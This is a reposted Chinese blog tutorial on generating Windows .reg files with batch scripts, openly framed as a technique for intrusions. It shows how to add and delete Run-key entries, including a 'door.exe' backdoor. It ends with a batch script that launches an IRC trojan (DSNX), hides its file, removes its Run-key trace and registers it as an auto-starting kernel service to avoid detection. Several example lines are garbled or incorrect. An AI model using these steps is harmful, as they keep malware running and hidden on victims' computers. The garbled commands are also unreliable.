如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序 而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定 的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
  关于注册表的操作,常见的是创建、修改、删除。
  1.创建
  创建分为两种,一种是创建子项(Subkey)
  我们创建一个文件,内容如下:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
  然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
  另一种是创建一个项目名称
  那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"
Invader"="Ex4rch"
  "Door"=C:\\WINNT\\system32\\door.exe
  "Autodos"=dword:02
  这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
  新建了:Invader、door、about这三个项目
  Invader的类型是“String Value”
  door的类型是“REG SZ Value”
  Autodos的类型是“DWORD Value”
  2.修改
  修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
  3.删除
  我们首先来说说删除一个项目名称,我们创建一个如下的文件:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "Ex4rch"=-
  执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
  我们再看看删除一个子项,我们创建一个如下的脚本:
  Windows Registry Editor Version 5.00
  [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
  相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
  samlpe1:如上面的那个例子,如想生成如下注册表文件
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  "Invader"="Ex4rch"
  "door"=hex:255
  "Autodos"=dword:000000128
  只需要这样:
  @echo Windows Registry Editor Version 5.00>>Sample.reg
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
  @echo "Invader"="Ex4rch">>Sample.reg
  @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
  @echo "Autodos"=dword:02>>Sample.reg
  samlpe2:
  我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启 动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例 (名为windrv32.exe)
  @start windrv32.exe
  @attrib +h +r windrv32.exe
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
  @echo "windsnx "=- >>patch.dll
  @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
  @regedit /s patch.dll
  @delete patch.dll
  @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
  @REM 这样不是更安全^_^.

本文转自 lvcaolhx 51CTO博客,原文链接:http://blog.51cto.com/lvcaolhx/11947
上一篇:NotePad++中如何把横向闪烁光标( _ )修改成竖向闪烁光标样式( | )?


下一篇:Java base64编码解码工具类